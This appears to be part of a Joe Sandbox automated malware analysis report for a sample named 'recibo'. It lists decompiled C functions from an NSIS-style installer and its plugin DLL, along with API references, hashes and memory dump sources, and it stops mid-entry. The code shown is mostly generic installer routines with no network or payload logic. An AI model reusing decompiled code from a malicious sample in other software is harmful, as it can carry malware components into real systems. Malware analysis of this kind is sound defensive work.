                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Char$Next$Prev
                                                                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 589700163-2977677972
                                                                                  • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                  • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                                  • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                  • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                  0x00404e62
                                                                                  0x00404e6f
                                                                                  0x00404e75
                                                                                  0x00404eb3
                                                                                  0x00404eb3
                                                                                  0x00404ec2
                                                                                  0x00404ec9
                                                                                  0x00000000
                                                                                  0x00404ecb
                                                                                  0x00404e77
                                                                                  0x00404e86
                                                                                  0x00404e8e
                                                                                  0x00404e91
                                                                                  0x00404ea3
                                                                                  0x00404ea9
                                                                                  0x00404eb0
                                                                                  0x00000000
                                                                                  0x00404eb0
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                                  • GetMessagePos.USER32 ref: 00404E77
                                                                                  • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$Send$ClientScreen
                                                                                  • String ID: f
                                                                                  • API String ID: 41195575-1993550816
                                                                                  • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                  • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                                  • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                  • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00401E4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 73%
                                                                                  			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce00 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce07 = 1;
				 *0x40ce04 = _t15 & 0x00000001;
				 *0x40ce05 = _t15 & 0x00000002;
				 *0x40ce06 = _t15 & 0x00000004;
				E0040657A(_t9, _t31, _t33, "Times New Roman",  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf0);
				_push(_t18);
				_push(_t31);
				E00406484();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                  0x00401e4e
                                                                                  0x00401e59
                                                                                  0x00401e5b
                                                                                  0x00401e68
                                                                                  0x00401e7f
                                                                                  0x00401e84
                                                                                  0x00401e91
                                                                                  0x00401e96
                                                                                  0x00401e9a
                                                                                  0x00401ea5
                                                                                  0x00401eac
                                                                                  0x00401ebe
                                                                                  0x00401ec4
                                                                                  0x00401ec9
                                                                                  0x00401ed3
                                                                                  0x00402638
                                                                                  0x0040156d
                                                                                  0x00402ba4
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • GetDC.USER32(?), ref: 00401E51
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                    • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                    • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000), ref: 00406779
                                                                                  • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                  • String ID: Times New Roman
                                                                                  • API String ID: 2584051700-927190056
                                                                                  • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                  • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                                                  • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                  • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 71542655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 75%
                                                                                  			E71542655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E715412BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M71542784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x7154407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x7154409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E71541510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x7154506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x7154506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x7154506c);
								goto L17;
							case 5:
								_push( *0x7154506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x71545000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E71541381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E71541312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}











                                                                                  0x7154265f
                                                                                  0x71542661
                                                                                  0x71542665
                                                                                  0x71542674
                                                                                  0x71542678
                                                                                  0x7154267d
                                                                                  0x7154267d
                                                                                  0x71542685
                                                                                  0x7154268c
                                                                                  0x71542692
                                                                                  0x00000000
                                                                                  0x71542699
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715426a1
                                                                                  0x715426a5
                                                                                  0x715426a8
                                                                                  0x715426ac
                                                                                  0x715426b3
                                                                                  0x715426b7
                                                                                  0x715426bd
                                                                                  0x715426bf
                                                                                  0x715426c1
                                                                                  0x715426c1
                                                                                  0x715426c8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715426d1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715426d8
                                                                                  0x715426de
                                                                                  0x715426e8
                                                                                  0x715426ee
                                                                                  0x715426f3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542714
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715426fa
                                                                                  0x71542700
                                                                                  0x71542701
                                                                                  0x71542703
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154271c
                                                                                  0x7154271e
                                                                                  0x71542724
                                                                                  0x7154272a
                                                                                  0x7154272a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542692
                                                                                  0x7154272d
                                                                                  0x7154272d
                                                                                  0x71542732
                                                                                  0x71542743
                                                                                  0x71542743
                                                                                  0x71542749
                                                                                  0x7154274e
                                                                                  0x71542753
                                                                                  0x7154275f
                                                                                  0x71542764
                                                                                  0x00000000
                                                                                  0x71542769
                                                                                  0x71542755
                                                                                  0x71542756
                                                                                  0x7154276a
                                                                                  0x7154276a
                                                                                  0x71542753
                                                                                  0x7154276b
                                                                                  0x7154276c
                                                                                  0x7154276f
                                                                                  0x71542783

                                                                                  APIs
                                                                                    • Part of subcall function 715412BB: GlobalAlloc.KERNEL32(00000040,?,715412DB,?,7154137F,00000019,715411CA,-000000A0), ref: 715412C5
                                                                                  • GlobalFree.KERNEL32(?), ref: 71542743
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 71542778
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23409278912.0000000071541000.00000020.00000001.01000000.00000004.sdmp, Offset: 71540000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23409236416.0000000071540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23409345991.0000000071544000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23409401287.0000000071546000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_71540000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Free$Alloc
                                                                                  • String ID:
                                                                                  • API String ID: 1780285237-0
                                                                                  • Opcode ID: c47ff356aa54df237ad5b2b406489fb9b4c39e09d63e8cc3dab9eb6b90c67b75
                                                                                  • Instruction ID: ffead5a842b6660cd981f45b822e36e2367bb695414f3bcfdf66d0c07ccb7025
                                                                                  • Opcode Fuzzy Hash: c47ff356aa54df237ad5b2b406489fb9b4c39e09d63e8cc3dab9eb6b90c67b75
                                                                                  • Instruction Fuzzy Hash: 4531FE72208112EFC71FDF66E9C4D2E7BB6FB85300321A529FD1687260DB3068189B61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 86%
                                                                                  			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E83(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406008(_t55);
				_t29 = E0040602D(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x434f14;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034E5(_t49);
							E004034CF(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                                                  0x00402950
                                                                                  0x00402952
                                                                                  0x00402957
                                                                                  0x0040295c
                                                                                  0x0040295f
                                                                                  0x00402969
                                                                                  0x0040296d
                                                                                  0x0040296d
                                                                                  0x00402973
                                                                                  0x00402980
                                                                                  0x00402988
                                                                                  0x0040298b
                                                                                  0x00402997
                                                                                  0x0040299a
                                                                                  0x004029a0
                                                                                  0x004029ae
                                                                                  0x004029b3
                                                                                  0x004029b7
                                                                                  0x004029ba
                                                                                  0x004029c3
                                                                                  0x004029cf
                                                                                  0x004029d3
                                                                                  0x004029d6
                                                                                  0x004029e0
                                                                                  0x004029ff
                                                                                  0x004029ec
                                                                                  0x004029f4
                                                                                  0x004029f7
                                                                                  0x004029fc
                                                                                  0x004029fc
                                                                                  0x00402a06
                                                                                  0x00402a06
                                                                                  0x00402a13
                                                                                  0x00402a19
                                                                                  0x00402a1f
                                                                                  0x00402a1f
                                                                                  0x004029b7
                                                                                  0x00402a33
                                                                                  0x00402a35
                                                                                  0x00402a35
                                                                                  0x00402a3f
                                                                                  0x00402a40
                                                                                  0x00402a44
                                                                                  0x00402a48
                                                                                  0x00402a4e
                                                                                  0x00402a4e
                                                                                  0x00402a55
                                                                                  0x004022f1
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                  • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2667972263-0
                                                                                  • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                  • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                                  • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                  • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 71542480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 85%
                                                                                  			E71542480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E7154135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E715412E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M715425F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E715413B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E715413B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x7154506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x7154506c, __eax,  *0x7154506c, 0, 0);
									goto L27;
								case 4:
									__eax = E715412CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E715413B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x7154506c =  *0x71545074 + ( *(__esi + 0x18) - 1) *  *0x7154506c * 2 + 0x18;
									 *__ebx =  *0x71545074 + ( *(__esi + 0x18) - 1) *  *0x7154506c * 2 + 0x18;
									asm("cdq");
									__eax = E71541510(__edx,  *0x71545074 + ( *(__esi + 0x18) - 1) *  *0x7154506c * 2 + 0x18, __edx,  *0x71545074 + ( *(__esi + 0x18) - 1) *  *0x7154506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E715412CC(0x71545044);
					goto L10;
				}
			}











                                                                                  0x71542494
                                                                                  0x71542498
                                                                                  0x715424a3
                                                                                  0x715424a3
                                                                                  0x715424aa
                                                                                  0x715424af
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715424b3
                                                                                  0x715424b6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715424bb
                                                                                  0x715424c6
                                                                                  0x715424d6
                                                                                  0x00000000
                                                                                  0x715424cd
                                                                                  0x715424cf
                                                                                  0x715424e5
                                                                                  0x00000000
                                                                                  0x715424e5
                                                                                  0x715424bd
                                                                                  0x715424bd
                                                                                  0x715424e6
                                                                                  0x715424e6
                                                                                  0x715424e8
                                                                                  0x715424ec
                                                                                  0x715424ec
                                                                                  0x715424ef
                                                                                  0x715424ef
                                                                                  0x715424f7
                                                                                  0x715424ff
                                                                                  0x71542502
                                                                                  0x715425c1
                                                                                  0x715425c2
                                                                                  0x715425cd
                                                                                  0x715425f7
                                                                                  0x715425f7
                                                                                  0x715425dd
                                                                                  0x715425e9
                                                                                  0x715425df
                                                                                  0x715425df
                                                                                  0x715425df
                                                                                  0x00000000
                                                                                  0x71542508
                                                                                  0x71542508
                                                                                  0x00000000
                                                                                  0x7154250f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542517
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542525
                                                                                  0x71542527
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542548
                                                                                  0x7154254e
                                                                                  0x71542551
                                                                                  0x71542553
                                                                                  0x71542563
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542530
                                                                                  0x71542535
                                                                                  0x71542538
                                                                                  0x71542539
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154256f
                                                                                  0x71542575
                                                                                  0x71542576
                                                                                  0x71542579
                                                                                  0x7154257a
                                                                                  0x7154257c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542588
                                                                                  0x7154258b
                                                                                  0x71542597
                                                                                  0x71542599
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715425a5
                                                                                  0x715425b1
                                                                                  0x715425b4
                                                                                  0x715425b6
                                                                                  0x715425b9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542508
                                                                                  0x71542502
                                                                                  0x715424db
                                                                                  0x715424e0
                                                                                  0x00000000
                                                                                  0x715424e0

                                                                                  APIs
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 715425C2
                                                                                    • Part of subcall function 715412CC: lstrcpynW.KERNEL32(00000000,?,7154137F,00000019,715411CA,-000000A0), ref: 715412DC
                                                                                  • GlobalAlloc.KERNEL32(00000040), ref: 71542548
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 71542563
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23409278912.0000000071541000.00000020.00000001.01000000.00000004.sdmp, Offset: 71540000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23409236416.0000000071540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23409345991.0000000071544000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23409401287.0000000071546000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_71540000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                  • String ID:
                                                                                  • API String ID: 4216380887-0
                                                                                  • Opcode ID: c4998b10af3c2448bd445dd3baf2afc259f7bc675199cd943023683103837e38
                                                                                  • Instruction ID: b20ffbe2f239aca6e48792ac5a9b99179497ff127cb42ad73ebc0f4f0c114fbb
                                                                                  • Opcode Fuzzy Hash: c4998b10af3c2448bd445dd3baf2afc259f7bc675199cd943023683103837e38
                                                                                  • Instruction Fuzzy Hash: 7341C2B1008316DFD71DEF26E884A6A77F8FB84310F21591EED5B8B585E730A548CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 77%
